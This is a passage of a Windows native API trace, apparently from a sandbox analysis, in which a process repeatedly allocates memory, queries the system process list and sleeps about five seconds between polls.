RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.426] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.432] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.439] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.446] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.446] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.454] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.461] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.468] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.475] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.481] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.488] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.488] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.495] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.497] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.502] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.509] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.515] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.522] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.528] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.536] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.560] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.567] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.575] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.582] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, 